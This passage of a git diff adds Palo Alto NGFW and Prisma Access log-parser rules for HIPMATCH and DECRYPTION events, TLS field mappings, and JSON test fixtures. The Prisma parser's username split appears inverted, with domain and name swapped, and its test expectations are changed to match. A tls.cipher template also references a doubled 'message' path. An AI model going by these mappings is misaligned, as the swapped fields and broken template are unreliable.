"8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json @@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..b0b294778 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml index 6382be28b..3b3fd8fc6 100644 --- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml @@ -297,3 +297,18 @@ paloalto.threat.name: description: The name of the threat name: paloalto.threat.name type: keyword + +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 113ef7fdb..d212c5fcc 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -235,12 +235,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -382,6 +382,167 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse @@ -577,7 +738,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -593,6 +754,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -602,7 +770,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" @@ -766,6 +934,9 @@ stages: paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}" paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}" paloalto.threat.name: "{{parsed_threat.message.threat_description}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: source.user.name: "{{parsed_event.message.SourceUser}}" user.name: "{{parsed_event.message.SourceUser}}" @@ -798,8 +969,8 @@ stages: set_finalize_user_name: actions: - set: - user.domain: '{{final.user.name.split("\\") | first}}' - user.name: '{{final.user.name.split("\\") | last}}' + user.domain: '{{final.user.name.split("\\") | last}}' + user.name: '{{final.user.name.split("\\") | first}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: user.domain: '{{final.user.email.split("@") | first}}' diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json index 1a4fba4b4..b32ea4d13 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json @@ -69,6 +69,7 @@ "1.1.1.1" ], "user": [ + "paloaltonetwork", "xxxxx" ] }, @@ -90,8 +91,8 @@ } }, "user": { - "domain": "paloaltonetwork", - "name": "xxxxx" + "domain": "xxxxx", + "name": "paloaltonetwork" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json index 512ae89e7..37c8000b9 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json @@ -62,6 +62,7 @@ "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -86,8 +87,8 @@ } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e4b1d5fab..e51f19fbb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -46,6 +47,7 @@ "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -61,8 +63,8 @@ } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json new file mode 100644 index 000000000..8a060536e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 